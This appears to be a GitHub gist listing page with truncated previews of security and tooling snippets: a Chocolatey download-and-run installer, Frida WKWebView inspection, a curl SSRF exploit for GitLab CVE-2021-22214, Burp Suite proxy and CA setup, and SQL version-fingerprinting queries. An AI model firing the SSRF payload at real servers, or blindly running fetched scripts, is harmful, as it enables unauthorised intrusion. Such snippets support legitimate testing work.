This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1')) | |
# Download Edge | |
cd ~\Downloads; Start-BitsTransfer "https://c2rsetup.officeapps.live.com/c2r/downloadEdge.aspx?platform=Default&source=EdgeStablePage&Channel=Stable&language=en&brand=M100" .\MicrosoftEdgeSetup.exe; Invoke-Expression .\MicrosoftEdgeSetup.exe | |
choco install git |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cd ~\Downloads; Start-BitsTransfer "https://c2rsetup.officeapps.live.com/c2r/downloadEdge.aspx?platform=Default&source=EdgeStablePage&Channel=Stable&language=en&brand=M100" .\MicrosoftEdgeSetup.exe; Invoke-Expression .\MicrosoftEdgeSetup.exe |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ObjC.choose(ObjC.classes['WKWebView'], { | |
onMatch: function (wk) { | |
console.log('onMatch: ', wk); | |
console.log('URL: ', wk.URL().toString()); | |
console.log('javaScriptEnabled: ', wk.configuration().preferences().javaScriptEnabled()); | |
console.log('allowFileAccessFromFileURLs: ', | |
wk.configuration().preferences().valueForKey_('allowFileAccessFromFileURLs').toString()); | |
console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString()); | |
console.log('allowUniversalAccessFromFileURLs: ', | |
wk.configuration().valueForKey_('allowUniversalAccessFromFileURLs').toString()); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://github.com/Vulnmachines/gitlab-cve-2021-22214/blob/main/cve-2021-22214 | |
curl -s -show-error -H 'Content-Type: application/json' https://127.0.0.7/api/v4/ci/lint -data '{ "include_merged_yaml": true, "content": "include:n remote: http://SSRFIP:PORT/api/v1/targets?test.yml"}' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ # HowTo set up AWS CLI version 2 to use Burp Suite | |
$ | |
$ # Requirements: Burp Suite, curl | |
$ | |
$ # 1. Installing AWS CLI version 2, configure and test | |
$ | |
$ curl https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip -o Downloads/awscliv2.zip | |
% Total % Received % Xferd Average Speed Time Time Time Current | |
Dload Upload Total Spent Left Speed | |
100 33.5M 100 33.5M 0 0 6825k 0 0:00:05 0:00:05 --:--:-- 7290k |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Set the URL to the Burp Suite CA certificate | |
BURP_CERT_URL="http://burpserver:8080/cert" | |
# Set the path to the system's CA certificates file | |
CA_CERT_FILE="/etc/ssl/certs/ca-certificates.crt" | |
# Download Burp Suite CA certificate | |
curl -sSL "$BURP_CERT_URL" -o /tmp/burp-ca-cert.pem |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
######################################################################### | |
#This software code is made available "AS IS" without warranties of any # | |
#kind. You may copy, display, modify and redistribute the software # | |
#code either by itself or as incorporated into your code; provided that # | |
#you do not remove any proprietary notices. Your use of this software # | |
#code is at your own risk and you waive any claim against Amazon # | |
#Digital Services, Inc. or its affiliates with respect to your use of # | |
#this software code. (c) 2006-2007 Amazon Digital Services, Inc. or its # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SELECT version(); | |
SHOW VARIABLES LIKE 'version'; | |
SELECT @@version; | |
SELECT version(); | |
SELECT @@version; | |
SELECT * FROM v$version; | |
SELECT * FROM $version; | |
SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition'); | |
SELECT sqlite_version(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
86a464881678c47bc3402b758fbdf404e47bd13a5de82554f2e60086670f391d |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
<title>URL Opener</title> | |
</head> | |
<body> | |
<h1>URL Opener</h1> | |
NewerOlder